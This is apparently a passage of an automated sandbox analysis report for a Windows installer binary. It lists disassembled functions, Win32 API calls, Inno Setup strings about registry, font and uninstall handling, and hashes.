                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$StretchText
                                                                                    • String ID:
                                                                                    • API String ID: 2984075790-0
                                                                                    • Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                                    • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                                    • Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                                    • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                                    APIs
                                                                                      • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                    • API String ID: 2051275411-1862435767
                                                                                    • Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                                    • Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
                                                                                    • Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                                    • Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
                                                                                    APIs
                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                                    • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                                    • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$Color$Draw$OffsetRect
                                                                                    • String ID:
                                                                                    • API String ID: 1005981011-0
                                                                                    • Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                                    • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                                    • Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                                    • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                                    APIs
                                                                                      • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                      • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
                                                                                    • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
                                                                                    • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
                                                                                    Strings
                                                                                    • Deleting Uninstall data files., xrefs: 00494957
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                    • String ID: Deleting Uninstall data files.
                                                                                    • API String ID: 1570157960-2568741658
                                                                                    • Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                                    • Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
                                                                                    • Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                                    • Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
                                                                                    • AddFontResourceA.GDI32(00000000), ref: 0046F27B
                                                                                    • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
                                                                                    Strings
                                                                                    • Failed to open Fonts registry key., xrefs: 0046F265
                                                                                    • AddFontResource, xrefs: 0046F299
                                                                                    • Failed to set value in Fonts registry key., xrefs: 0046F250
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                    • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                    • API String ID: 955540645-649663873
                                                                                    • Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                                    • Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
                                                                                    • Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                                    • Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
                                                                                    APIs
                                                                                      • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                      • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                      • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                    • GetVersion.KERNEL32 ref: 00462588
                                                                                    • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
                                                                                    • SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00462601
                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
                                                                                    • SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                    • String ID: Explorer
                                                                                    • API String ID: 2594429197-512347832
                                                                                    • Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                                    • Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
                                                                                    • Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                                    • Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                    • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC), ref: 00476E74
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                    • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                    • API String ID: 2704155762-2318956294
                                                                                    • Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                                    • Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
                                                                                    • Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                                    • Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
                                                                                    APIs
                                                                                    • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                                    • LocalFree.KERNEL32(00642FA8,00000000,00401B68), ref: 00401ACF
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00642FA8,00000000,00401B68), ref: 00401AEE
                                                                                    • LocalFree.KERNEL32(00643FA8,?,00000000,00008000,00642FA8,00000000,00401B68), ref: 00401B2D
                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                                    • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                    • String ID: |Ed
                                                                                    • API String ID: 3782394904-1702581799
                                                                                    • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                    • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                                    • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                    • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
                                                                                      • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
                                                                                    Strings
                                                                                    • Failed to strip read-only attribute., xrefs: 004595C0
                                                                                    • Deleting directory: %s, xrefs: 0045957B
                                                                                    • Failed to delete directory (%d). Will retry later., xrefs: 0045960B
                                                                                    • Failed to delete directory (%d)., xrefs: 00459688
                                                                                    • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
                                                                                    • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
                                                                                    • Stripped read-only attribute., xrefs: 004595B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseErrorFindLast
                                                                                    • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                    • API String ID: 754982922-1448842058
                                                                                    • Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                                    • Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
                                                                                    • Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                                    • Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E
                                                                                    APIs
                                                                                    • GetCapture.USER32 ref: 00422EB4
                                                                                    • GetCapture.USER32 ref: 00422EC3
                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                    • ReleaseCapture.USER32 ref: 00422ECE
                                                                                    • GetActiveWindow.USER32 ref: 00422EDD
                                                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                    • GetActiveWindow.USER32 ref: 00422FCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                    • String ID:
                                                                                    • API String ID: 862346643-0
                                                                                    • Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                                    • Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
                                                                                    • Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                                    • Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
                                                                                    APIs
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                                    • GetActiveWindow.USER32 ref: 0042F14E
                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
                                                                                    • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$Message
                                                                                    • String ID:
                                                                                    • API String ID: 2785966331-0
                                                                                    • Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                    • Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
                                                                                    • Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                    • Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000), ref: 0042949A
                                                                                    • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                      • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                    • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                    • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                    • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                    • String ID:
                                                                                    • API String ID: 361401722-0
                                                                                    • Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                                    • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                                    • Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                                    • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
                                                                                    • 73A14620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
                                                                                    • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
                                                                                    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                    • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                    • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                    • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                    • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectStock$A14620A480A570IconLoad
                                                                                    • String ID:
                                                                                    • API String ID: 2920975243-0
                                                                                    • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                    • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                                    • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                    • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                                    APIs
                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
                                                                                    • SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load
                                                                                    • String ID: $ $Internal error: Item already expanding
                                                                                    • API String ID: 1675784387-1948079669
                                                                                    • Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                                    • Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
                                                                                    • Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                                    • Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19
